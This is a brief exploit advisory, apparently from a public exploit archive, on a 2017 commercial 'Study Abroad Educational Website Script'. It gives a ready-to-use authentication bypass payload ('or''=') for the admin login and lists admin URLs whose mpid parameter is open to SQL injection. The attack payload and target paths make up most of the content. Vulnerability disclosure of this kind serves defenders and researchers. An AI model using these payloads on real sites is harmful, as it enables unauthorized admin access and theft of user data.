17 lines
No EOL
723 B
Text
17 lines
No EOL
723 B
Text
# # # # #
|
|
# Vulnerability: SQL Injection + Authentication Bypass
|
|
# Date: 18.01.2017
|
|
# Vendor Homepage: http://www.scriptgiant.com/
|
|
# Script Name: Study Abroad Educational Website Script
|
|
# Script Buy Now: http://www.popularclones.com/products/Study-Abroad-Educational-Website
|
|
# Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# Authentication Bypass :
|
|
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/admin/list_blogs.php?mpid=[SQL]
|
|
# http://localhost/[PATH]/admin/list_listing.php?mpid=[SQL]
|
|
# E.t.c.... Other files, too. SQL There are security vulnerabilities.
|
|
# # # # # |